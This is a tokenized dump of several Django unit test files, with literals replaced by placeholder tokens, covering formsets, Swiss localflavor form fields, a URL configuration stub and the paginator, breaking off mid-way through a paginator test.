<NUM_LIT:0> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : False , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> ] ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . deleted_forms ] , [ { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : u'<STR_LIT>' } ] ) <EOL> def test_invalid_deleted_form_with_ordering ( self ) : <EOL> class Person ( Form ) : <EOL> name = CharField ( ) <EOL> PeopleForm = formset_factory ( form = Person , can_delete = True , can_order = True ) <EOL> p = PeopleForm ( { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } ) <EOL> self . assertTrue ( p . is_valid ( ) ) <EOL> self . assertEqual ( p . ordered_forms , [ ] ) <EOL> def test_clean_hook ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FavoriteDrinksFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> for error in formset . non_form_errors ( ) : <EOL> self . assertEqual ( str ( error ) , '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FavoriteDrinksFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . non_form_errors ( ) , [ ] ) <EOL> def test_limiting_max_forms ( self ) : <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:3> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:3> , max_num = <NUM_LIT:0> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertEqual ( '<STR_LIT:\n>' . join ( form_output ) , "<STR_LIT>" ) <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:5> , max_num = <NUM_LIT:2> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:1> , max_num = <NUM_LIT:2> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> def test_max_num_with_initial_data ( self ) : <EOL> initial = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:1> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( initial = initial ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> def test_max_num_zero ( self ) : <EOL> initial = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:1> , max_num = <NUM_LIT:0> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( initial = initial ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertEqual ( '<STR_LIT:\n>' . join ( form_output ) , "<STR_LIT>" ) <EOL> def test_more_initial_than_max_num ( self ) : <EOL> initial = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:1> , max_num = <NUM_LIT:2> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( initial = initial ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> initial = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:3> , max_num = <NUM_LIT:2> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( initial = initial ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> def test_regression_6926 ( self ) : <EOL> formset = FavoriteDrinksFormSet ( ) <EOL> self . assertEqual ( formset . management_form . prefix , '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> formset = FavoriteDrinksFormSet ( data = data ) <EOL> self . assertEqual ( formset . management_form . prefix , '<STR_LIT>' ) <EOL> formset = FavoriteDrinksFormSet ( initial = { } ) <EOL> self . assertEqual ( formset . management_form . prefix , '<STR_LIT>' ) <EOL> def test_regression_12878 ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FavoriteDrinksFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . non_form_errors ( ) , [ u'<STR_LIT>' ] ) <EOL> def test_formset_iteration ( self ) : <EOL> ChoiceFormset = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormset ( ) <EOL> forms = list ( formset ) <EOL> self . assertEqual ( forms , formset . forms ) <EOL> self . assertEqual ( len ( formset ) , len ( forms ) ) <EOL> self . assertEqual ( formset [ <NUM_LIT:0> ] , forms [ <NUM_LIT:0> ] ) <EOL> try : <EOL> formset [ <NUM_LIT:3> ] <EOL> self . fail ( '<STR_LIT>' ) <EOL> except IndexError : <EOL> pass <EOL> class BaseReverseFormSet ( BaseFormSet ) : <EOL> def __iter__ ( self ) : <EOL> return reversed ( self . forms ) <EOL> def __getitem__ ( self , idx ) : <EOL> return super ( BaseReverseFormSet , self ) . __getitem__ ( len ( self ) - idx - <NUM_LIT:1> ) <EOL> ReverseChoiceFormset = formset_factory ( Choice , BaseReverseFormSet , extra = <NUM_LIT:3> ) <EOL> reverse_formset = ReverseChoiceFormset ( ) <EOL> self . assertEqual ( str ( reverse_formset [ <NUM_LIT:0> ] ) , str ( forms [ - <NUM_LIT:1> ] ) ) <EOL> self . assertEqual ( str ( reverse_formset [ <NUM_LIT:1> ] ) , str ( forms [ - <NUM_LIT:2> ] ) ) <EOL> self . assertEqual ( len ( reverse_formset ) , len ( forms ) ) <EOL> def test_formset_nonzero ( self ) : <EOL> """<STR_LIT>""" <EOL> ChoiceFormset = formset_factory ( Choice , extra = <NUM_LIT:0> ) <EOL> formset = ChoiceFormset ( ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:0> ) <EOL> self . assertTrue ( formset ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> } <EOL> class Choice ( Form ) : <EOL> choice = CharField ( ) <EOL> votes = IntegerField ( ) <EOL> ChoiceFormSet = formset_factory ( Choice ) <EOL> class FormsetAsFooTests ( TestCase ) : <EOL> def test_as_table ( self ) : <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . as_table ( ) , """<STR_LIT>""" ) <EOL> def test_as_p ( self ) : <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . as_p ( ) , """<STR_LIT>""" ) <EOL> def test_as_ul ( self ) : <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . as_ul ( ) , """<STR_LIT>""" ) <EOL> class ArticleForm ( Form ) : <EOL> title = CharField ( ) <EOL> pub_date = DateField ( ) <EOL> ArticleFormSet = formset_factory ( ArticleForm ) <EOL> class TestIsBoundBehavior ( TestCase ) : <EOL> def test_no_data_raises_validation_error ( self ) : <EOL> self . assertRaises ( ValidationError , ArticleFormSet , { } ) <EOL> def test_with_management_data_attrs_work_fine ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : u'<STR_LIT:1>' , <EOL> '<STR_LIT>' : u'<STR_LIT:0>' , <EOL> } <EOL> formset = ArticleFormSet ( data ) <EOL> self . assertEqual ( <NUM_LIT:0> , formset . initial_form_count ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , formset . total_form_count ( ) ) <EOL> self . assertTrue ( formset . is_bound ) <EOL> self . assertTrue ( formset . forms [ <NUM_LIT:0> ] . is_bound ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertTrue ( formset . forms [ <NUM_LIT:0> ] . is_valid ( ) ) <EOL> self . assertEqual ( [ { } ] , formset . cleaned_data ) <EOL> def test_form_errors_are_cought_by_formset ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : u'<STR_LIT:2>' , <EOL> '<STR_LIT>' : u'<STR_LIT:0>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> formset = ArticleFormSet ( data ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ { } , { '<STR_LIT>' : [ u'<STR_LIT>' ] } ] , formset . errors ) <EOL> def test_empty_forms_are_unbound ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : u'<STR_LIT:1>' , <EOL> '<STR_LIT>' : u'<STR_LIT:0>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> unbound_formset = ArticleFormSet ( ) <EOL> bound_formset = ArticleFormSet ( data ) <EOL> empty_forms = [ ] <EOL> empty_forms . append ( unbound_formset . empty_form ) <EOL> empty_forms . append ( bound_formset . empty_form ) <EOL> self . assertFalse ( empty_forms [ <NUM_LIT:0> ] . is_bound ) <EOL> self . assertFalse ( empty_forms [ <NUM_LIT:1> ] . is_bound ) <EOL> self . assertHTMLEqual ( empty_forms [ <NUM_LIT:0> ] . as_p ( ) , empty_forms [ <NUM_LIT:1> ] . as_p ( ) ) <EOL> class TestEmptyFormSet ( TestCase ) : <EOL> "<STR_LIT>" <EOL> def test_empty_formset_is_valid ( self ) : <EOL> EmptyFsetWontValidateFormset = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:0> , formset = EmptyFsetWontValidate ) <EOL> formset = EmptyFsetWontValidateFormset ( data = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:0>' } , prefix = "<STR_LIT>" ) <EOL> formset2 = EmptyFsetWontValidateFormset ( data = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , prefix = "<STR_LIT>" ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertFalse ( formset2 . is_valid ( ) ) </s>
<s> from django . contrib . localflavor . ch . forms import ( CHZipCodeField , <EOL> CHPhoneNumberField , CHIdentityCardNumberField , CHStateSelect ) <EOL> from django . test import SimpleTestCase <EOL> class CHLocalFlavorTests ( SimpleTestCase ) : <EOL> def test_CHStateSelect ( self ) : <EOL> f = CHStateSelect ( ) <EOL> out = u'''<STR_LIT>''' <EOL> self . assertHTMLEqual ( f . render ( '<STR_LIT:state>' , '<STR_LIT>' ) , out ) <EOL> def test_CHZipCodeField ( self ) : <EOL> error_format = [ u'<STR_LIT>' ] <EOL> valid = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> invalid = { <EOL> '<STR_LIT>' : error_format , <EOL> '<STR_LIT>' : error_format , <EOL> } <EOL> self . assertFieldOutput ( CHZipCodeField , valid , invalid ) <EOL> def test_CHPhoneNumberField ( self ) : <EOL> error_format = [ u'<STR_LIT>' ] <EOL> valid = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> invalid = { <EOL> '<STR_LIT>' : error_format , <EOL> '<STR_LIT>' : error_format , <EOL> } <EOL> self . assertFieldOutput ( CHPhoneNumberField , valid , invalid ) <EOL> def test_CHIdentityCardNumberField ( self ) : <EOL> error_format = [ u'<STR_LIT>' ] <EOL> valid = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> invalid = { <EOL> '<STR_LIT>' : error_format , <EOL> '<STR_LIT>' : error_format , <EOL> } <EOL> self . assertFieldOutput ( CHIdentityCardNumberField , valid , invalid ) </s>
<s> from django . conf . urls import patterns <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) </s>
<s> from django . core . paginator import Paginator , EmptyPage , PageNotAnInteger <EOL> from django . utils . unittest import TestCase <EOL> class PaginatorTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def check_paginator ( self , params , output ) : <EOL> """<STR_LIT>""" <EOL> count , num_pages , page_range = output <EOL> paginator = Paginator ( * params ) <EOL> self . check_attribute ( '<STR_LIT:count>' , paginator , count , params ) <EOL> self . check_attribute ( '<STR_LIT>' , paginator , num_pages , params ) <EOL> self . check_attribute ( '<STR_LIT>' , paginator , page_range , params ) <EOL> def check_attribute ( self , name , paginator , expected , params ) : <EOL> """<STR_LIT>""" <EOL> got = getattr ( paginator , name ) <EOL> self . assertEqual ( expected , got , <EOL> "<STR_LIT>" <EOL> % ( name , expected , got , params ) ) <EOL> def test_invalid_page_number ( self ) : <EOL> """<STR_LIT>""" <EOL> paginator = Paginator ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <NUM_LIT:2> ) <EOL> self . assertRaises ( PageNotAnInteger , paginator . validate_number , None ) <EOL> self . assertRaises ( PageNotAnInteger , paginator . validate_number , '<STR_LIT:x>' ) <EOL> def test_paginator ( self ) : <EOL> """<STR_LIT>""" <EOL> nine = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] <EOL> ten = nine + [ <NUM_LIT:10> ] <EOL> eleven = ten + [ <NUM_LIT:11> ] <EOL> tests = ( <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:0> , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:1> , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:2> , False ) , ( <NUM_LIT:10> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:5> , False ) , ( <NUM_LIT:10> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:6> , False ) , ( <NUM_LIT:10> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:10> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:5> , True ) , ( <NUM_LIT:10> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:6> , True ) , ( <NUM_LIT:10> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:0> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:1> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:2> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:0> , False ) , ( <NUM_LIT:0> , <NUM_LIT:0> , [ ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:1> , False ) , ( <NUM_LIT:0> , <NUM_LIT:0> , [ ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:2> , False ) , ( <NUM_LIT:0> , <NUM_LIT:0> , [ ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:1> , <NUM_LIT:0> , True ) , ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:1> , <NUM_LIT:0> , False ) , ( <NUM_LIT:0> , <NUM_LIT:0> , [ ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:2> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( nine , <NUM_LIT:10> , <NUM_LIT:0> , True ) , ( <NUM_LIT:9> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:1> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:2> , <NUM_LIT:0> , True ) , ( <NUM_LIT:2> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( ten , <NUM_LIT:10> , <NUM_LIT:0> , True ) , ( <NUM_LIT:10> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:1> , <NUM_LIT:0> , True ) , ( <NUM_LIT:2> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <NUM_LIT:2> , <NUM_LIT:0> , True ) , ( <NUM_LIT:3> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( eleven , <NUM_LIT:10> , <NUM_LIT:0> , True ) , ( <NUM_LIT:11> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:1> , <NUM_LIT:1> , True ) , ( <NUM_LIT:2> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <NUM_LIT:2> , <NUM_LIT:1> , True ) , ( <NUM_LIT:3> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( eleven , <NUM_LIT:10> , <NUM_LIT:1> , True ) , ( <NUM_LIT:11> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( ten , '<STR_LIT:4>' , <NUM_LIT:1> , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , u'<STR_LIT:4>' , <NUM_LIT:1> , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , '<STR_LIT:1>' , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , u'<STR_LIT:1>' , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ) <EOL> for params , output in tests : <EOL> self . check_paginator ( params , output ) <EOL> def check_indexes ( self , params , page_num , indexes ) : <EOL> """<STR_LIT>""" <EOL> paginator = Paginator ( * params ) <EOL> if page_num == '<STR_LIT>' : <EOL> page_num = <NUM_LIT:1> <EOL> elif page_num == '<STR_LIT>' : <EOL> page_num = paginator . num_pages <EOL> page = paginator . page ( page_num ) <EOL> start , end = indexes <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( start , page . start_index ( ) , <EOL> msg % ( '<STR_LIT>' , page_num , start , page . start_index ( ) , params ) ) <EOL> self . assertEqual ( end , page . end_index ( ) , <EOL> msg % ( '<STR_LIT>' , page_num , end , page . end_index ( ) , params ) ) <EOL> def test_page_indexes ( self ) : <EOL> """<STR_LIT>""" <EOL> ten = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> ] <EOL> tests = ( <EOL> ( ( ten , <NUM_LIT:1> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:10> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:2> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:9> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:3> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:10> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:5> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:5> ) , ( <NUM_LIT:6> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:1> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:9> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:1> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:8> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:3> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:7> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:3> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:7> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:3> , <NUM_LIT:4> , True ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:4> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:5> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:5> ) , ( <NUM_LIT:6> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:5> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:5> ) , ( <NUM_LIT:6> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:5> , <NUM_LIT:5> , True ) , ( <NUM_LIT:1> , <NUM_LIT:10> ) , ( <NUM_LIT:1> , <NUM_LIT:10> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:0> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:1> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:2> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( 